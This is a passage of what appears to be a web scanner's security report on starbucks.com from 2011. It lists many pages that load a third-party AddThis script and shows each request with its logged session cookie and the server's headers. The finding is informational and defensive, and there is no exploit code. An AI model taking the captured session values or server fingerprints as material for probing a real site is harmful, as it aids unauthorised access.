<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 300 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.starbucks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:09:57 GMT
Connection: close
Content-Length: 41029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.2. http://www.starbucks.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 38374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.3. http://www.starbucks.com/about-us/company-information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:52 GMT
Connection: close
Content-Length: 39059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.4. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/online-policies/privacy-statement HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:11 GMT
Connection: close
Content-Length: 52740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.5. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/online-policies/terms-of-use HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:20 GMT
Connection: close
Content-Length: 68702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.6. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/online-policies/web-accessibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:55 GMT
Connection: close
Content-Length: 39158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.7. http://www.starbucks.com/about-us/company-information/product-advisories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/product-advisories HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:53 GMT
Connection: close
Content-Length: 38316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.8. http://www.starbucks.com/about-us/our-heritage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/our-heritage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:47 GMT
Connection: close
Content-Length: 37409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.9. http://www.starbucks.com/business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:23 GMT
Connection: close
Content-Length: 36412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.10. http://www.starbucks.com/business/foodservice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/foodservice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/foodservice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:47 GMT
Connection: close
Content-Length: 35575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.11. http://www.starbucks.com/business/international-stores  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/international-stores

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/international-stores HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:37 GMT
Connection: close
Content-Length: 36017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.12. http://www.starbucks.com/business/licensed-stores  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/licensed-stores

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/licensed-stores HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:52 GMT
Connection: close
Content-Length: 35456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.13. http://www.starbucks.com/business/office-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/office-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/office-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:28 GMT
Connection: close
Content-Length: 37439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.14. http://www.starbucks.com/career-center  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:02 GMT
Connection: close
Content-Length: 42603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.15. http://www.starbucks.com/career-center/career-diversity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/career-diversity HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
